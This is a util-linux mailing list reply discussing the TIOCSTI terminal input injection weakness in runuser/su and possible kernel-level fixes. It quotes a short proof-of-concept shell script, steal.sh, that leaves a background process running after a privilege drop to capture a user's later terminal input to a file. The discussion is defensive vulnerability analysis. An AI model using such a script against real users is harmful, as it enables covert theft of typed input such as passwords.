On 02/03/16 20:35, Stanislav Brabec wrote:
Another possible fixes would be:
- Request redirection of all I/O channels. (I. e. documentation fix
plus possible command line option to make it simpler.)
- Or create custom pty container (like script does).
- Or create a kernel level fix restricting TIOCSTI and let utilities as
they are.
First two will have side effects, third seems to be a right way to me.
+1
IMHO a process without CAP_SYS_ADMIN (or similar) shouldn't be able to
fake input¹ into a terminal owned² by a different user.
¹ yes, that's the goal of TIOCSTI)
² Not a complete solution, since you could have:
$ su root su $USER -s ./test_tiocsti
but if you are the owner of the terminal, it could do all kind of nasty
things all the way down anyway.
Additionally, https://bugzilla.redhat.com/show_bug.cgi?id=173008 says,
that even it does not handle all possible attacks, because attacker can
still read and write to the terminal:
==== steal.sh ====
#!/bin/sh
(
sleep 3
exec 0>&1
echo "Hallo">/dev/stdout
cat>/tmp/nobody-savefile
)&
==================
~/util-linux # ./runuser -u nobody ./steal.sh
~/util-linux # Hallo
Nice use of background process with what is otherwise expected.
The is that the user is tricked into thinking that the child process
[tree] has finished while it hasn't.
However, it doesn't seem work here:
./steal.sh: line 5: /dev/stdout: Permission denied
cat: -: Input/output error
--
To unsubscribe from this list: send the line "unsubscribe util-linux" in
the body of a message to majordomo@xxxxxxxxxxxxxxx
More majordomo info at http://vger.kernel.org/majordomo-info.html